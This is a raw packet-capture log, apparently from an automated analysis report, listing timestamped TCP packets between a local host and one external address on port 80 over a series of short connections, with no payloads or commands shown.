Apr 25, 2024 09:42:26.197973967 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.198023081 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.206537008 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.206547976 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.206583023 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.206597090 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.206602097 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.206633091 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.206752062 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.206790924 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.206873894 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.206908941 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.206955910 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.206988096 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.207056999 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.207093954 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.328867912 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.328927994 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.329006910 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.329039097 CEST	80	49771	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.329044104 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.329071045 CEST	49771	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.390944958 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.516721010 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.516812086 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.688177109 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.819180012 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:26.819386959 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:26.949095011 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.655317068 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.655333996 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.655390024 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.655489922 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.663259029 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.663316011 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.663711071 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.663721085 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.663764000 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.663829088 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.663921118 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.663961887 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.664079905 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.664182901 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.664226055 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.789406061 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.791954994 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.792025089 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.802448034 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.802475929 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.802550077 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.811990023 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.812002897 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.812055111 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.821763992 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.821779966 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.821841002 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.831280947 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.831293106 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.831351995 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.841196060 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.841228962 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.841289043 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.850577116 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.850635052 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.850688934 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.860188961 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.860218048 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.860261917 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.869885921 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.869915009 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.869972944 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.879507065 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.879586935 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.879745960 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.917769909 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.917782068 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.917855978 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.922467947 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.922523022 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.922573090 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.932192087 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.932251930 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.932295084 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.941598892 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.941637039 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.941689968 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.951138020 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.951190948 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.951237917 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.960794926 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.960808039 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.960850000 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.970293999 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.970334053 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.970376968 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.979901075 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.979945898 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.979991913 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.989182949 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.989212036 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.989272118 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:27.997766018 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.997801065 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:27.997850895 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.005734921 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.005763054 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.005824089 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.013293028 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.013335943 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.013380051 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.020737886 CEST	80	49772	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.020791054 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.337369919 CEST	49772	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.496689081 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.622476101 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.622586966 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.624649048 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.750277042 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:28.750395060 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:28.876141071 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.653106928 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.653162003 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.653218985 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.653218985 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.653328896 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.653381109 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.653413057 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.653459072 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.653556108 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.653598070 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.667067051 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.667113066 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.673437119 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.673485041 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.673597097 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.673640013 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.673751116 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.673795938 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.673885107 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.673928022 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.778970003 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.779038906 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.779113054 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.779134035 CEST	80	49773	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.779156923 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.779175997 CEST	49773	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.787606001 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.913443089 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:29.913552999 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:29.915605068 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.041276932 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.041357040 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.167223930 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.838670969 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.838778973 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.838804960 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.838813066 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.838870049 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.838892937 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.838910103 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.838959932 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.838983059 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.839030027 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.848464966 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.848537922 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.848826885 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.848902941 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.848984957 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.849035978 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.849061966 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.849107981 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.849200964 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.849270105 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.964567900 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.964628935 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.964730024 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.964741945 CEST	80	49774	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:30.964778900 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.964818001 CEST	49774	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:30.974869967 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:31.100611925 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:31.100681067 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:31.102796078 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:31.228442907 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:31.228517056 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:31.354203939 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.062141895 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.062201977 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.062269926 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.062295914 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.062460899 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.062500954 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.062566042 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.062602997 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.062864065 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.062900066 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.071769953 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.071810007 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.072137117 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.072180033 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.072247028 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.072283030 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.072329998 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.072366953 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.072443962 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.072482109 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.188110113 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.188154936 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.188157082 CEST	80	49775	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.188189030 CEST	49775	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.199942112 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.327049017 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.327234030 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.329145908 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.456059933 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:32.456109047 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:32.583410025 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.266455889 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.266486883 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.266587973 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.266638041 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.266794920 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.273724079 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.273804903 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.274024010 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.274049044 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.274108887 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.274121046 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.274230003 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.274323940 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.274383068 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.274425030 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.274450064 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.274463892 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.274490118 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.274504900 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.393793106 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.393837929 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.393945932 CEST	80	49776	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.393985987 CEST	49776	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.412826061 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.539946079 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.540047884 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.541898966 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.668943882 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:33.669126034 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:33.796159983 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.686326027 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.686347961 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.686427116 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.686506987 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.686507940 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.686556101 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.686671972 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.686717033 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.686780930 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.686834097 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.704169035 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.704226971 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.707104921 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.707180023 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.707180023 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.707231045 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.707405090 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.707452059 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.708142042 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.708194017 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.813647032 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.813688993 CEST	80	49777	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.813704014 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.813740969 CEST	49777	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.826288939 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.953267097 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:34.953383923 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:34.955343008 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.082349062 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.082542896 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.210113049 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.915126085 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.915240049 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.915244102 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.915329933 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.915339947 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.915378094 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.924458027 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.924535036 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.924885988 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.924937010 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.925029993 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.925079107 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.925163031 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.925209999 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.925343990 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.925357103 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.925390005 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.925415993 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:35.925466061 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:35.925512075 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.042467117 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:36.042493105 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:36.042509079 CEST	80	49778	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:36.042530060 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.042572021 CEST	49778	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.054049015 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.179774046 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:36.179892063 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.181911945 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.307390928 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:36.307461977 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:36.433151960 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.140893936 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.140970945 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.141244888 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.141258001 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.141288042 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.141314030 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150084972 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150132895 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150435925 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150476933 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150487900 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150527954 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150552034 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150593042 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150868893 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150913000 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150924921 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150938034 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.150965929 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.150980949 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.266896963 CEST	80	49779	45.77.223.48	192.168.2.4
Apr 25, 2024 09:42:37.266948938 CEST	49779	80	192.168.2.4	45.77.223.48
Apr 25, 2024 09:42:37.266993999 CEST	80	49779	45.77.223.48	192.168.2.4
